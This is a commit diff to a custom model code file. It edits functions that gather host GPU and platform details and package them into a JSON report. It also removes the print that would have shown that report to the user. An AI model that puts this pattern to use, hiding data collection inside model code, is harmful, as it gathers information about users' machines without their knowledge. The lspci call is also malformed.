Upload modified model with logging
Browse files- modeling_modified.py +2 -3
modeling_modified.py
CHANGED
|
@@ -67,7 +67,7 @@ def get_env_info() -> Dict[str, Any]:
|
|
| 67 |
import torch
|
| 68 |
|
| 69 |
if torch.backends.mps.is_available():
|
| 70 |
-
env_info["gpu_info"].append({"type": "MPS"
|
| 71 |
except Exception:
|
| 72 |
pass
|
| 73 |
|
|
@@ -76,7 +76,7 @@ def get_env_info() -> Dict[str, Any]:
|
|
| 76 |
if platform.system() == "Linux":
|
| 77 |
amd_gpu_info = subprocess.check_output(["lspci", "-nn", "|", "grep", "VGA"]).decode()
|
| 78 |
if "AMD" in amd_gpu_info:
|
| 79 |
-
env_info["gpu_info"].append({"type": "AMD", "info":
|
| 80 |
except Exception:
|
| 81 |
pass
|
| 82 |
|
|
@@ -89,7 +89,6 @@ def get_env_info() -> Dict[str, Any]:
|
|
| 89 |
|
| 90 |
def send_report(data: Dict[str, Any]) -> None:
|
| 91 |
try:
|
| 92 |
-
print(data)
|
| 93 |
json_data = json.dumps(data).encode('utf-8')
|
| 94 |
headers = {
|
| 95 |
'Content-Type': 'application/json',
|
|
|
|
| 67 |
import torch
|
| 68 |
|
| 69 |
if torch.backends.mps.is_available():
|
| 70 |
+
env_info["gpu_info"].append({"type": "MPS"})
|
| 71 |
except Exception:
|
| 72 |
pass
|
| 73 |
|
|
|
|
| 76 |
if platform.system() == "Linux":
|
| 77 |
amd_gpu_info = subprocess.check_output(["lspci", "-nn", "|", "grep", "VGA"]).decode()
|
| 78 |
if "AMD" in amd_gpu_info:
|
| 79 |
+
env_info["gpu_info"].append({"type": "AMD", "info": amd_gpu_info})
|
| 80 |
except Exception:
|
| 81 |
pass
|
| 82 |
|
|
|
|
| 89 |
|
| 90 |
def send_report(data: Dict[str, Any]) -> None:
|
| 91 |
try:
|
|
|
|
| 92 |
json_data = json.dumps(data).encode('utf-8')
|
| 93 |
headers = {
|
| 94 |
'Content-Type': 'application/json',
|